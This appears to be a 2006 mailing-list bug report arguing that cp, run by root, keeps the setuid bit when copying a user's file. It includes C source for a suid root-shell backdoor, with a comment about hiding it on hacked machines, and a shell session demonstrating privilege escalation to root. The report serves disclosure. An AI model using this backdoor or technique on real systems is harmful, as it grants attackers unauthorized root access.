Permissions over suid files
From: Pedro Andujar
Subject: Permissions over suid files
Date: Mon, 2 Oct 2006 16:15:41 +0200

Hello,
When root copies a non-privileged user's file that has the suid bit set,
the file gets "chowned" to root and the suid bit is not removed.
That could mean a security compromise.
Example:
address@hidden ~]$ cat > c.c
/* Suid shell || uid=0(root) gid=0(root) || You compile it and hide it
* on the hacked machine. Then: "chmod 6755 suidshell", all of
* this as root. Crg
*/
#include <stdio.h>
#define root 0
main()
{
system("clear");
printf("Now you are r00t!!\n\n");
seteuid(root);
setuid(root);
setgid(root);
/* change "/bin/bash" to "/bin/sh" in case the system does not have bash */
system("/bin/bash");
}
address@hidden ~]$ make c
cc c.c -o c
address@hidden ~]$ chmod 6755 c
**now root**
address@hidden tmp]# cp /home/pandujar/c ./
address@hidden tmp]# ls -l c
-rwsr-sr-x 1 root root 5172 Oct 2 16:13 c
**user again**
address@hidden ~]$ /tmp/c
Now you are r00t!!
address@hidden ~]#
Other tools like "chown" have this kind of protection:
address@hidden tmp]# cd /home/pandujar/
address@hidden pandujar]# ls -l c
-rwsr-sr-x 1 pandujar tiger 5172 Oct 2 16:13 c
address@hidden pandujar]# chown root.root c
address@hidden pandujar]# ls -l c
-rwxr-xr-x 1 root root 5172 Oct 2 16:13 c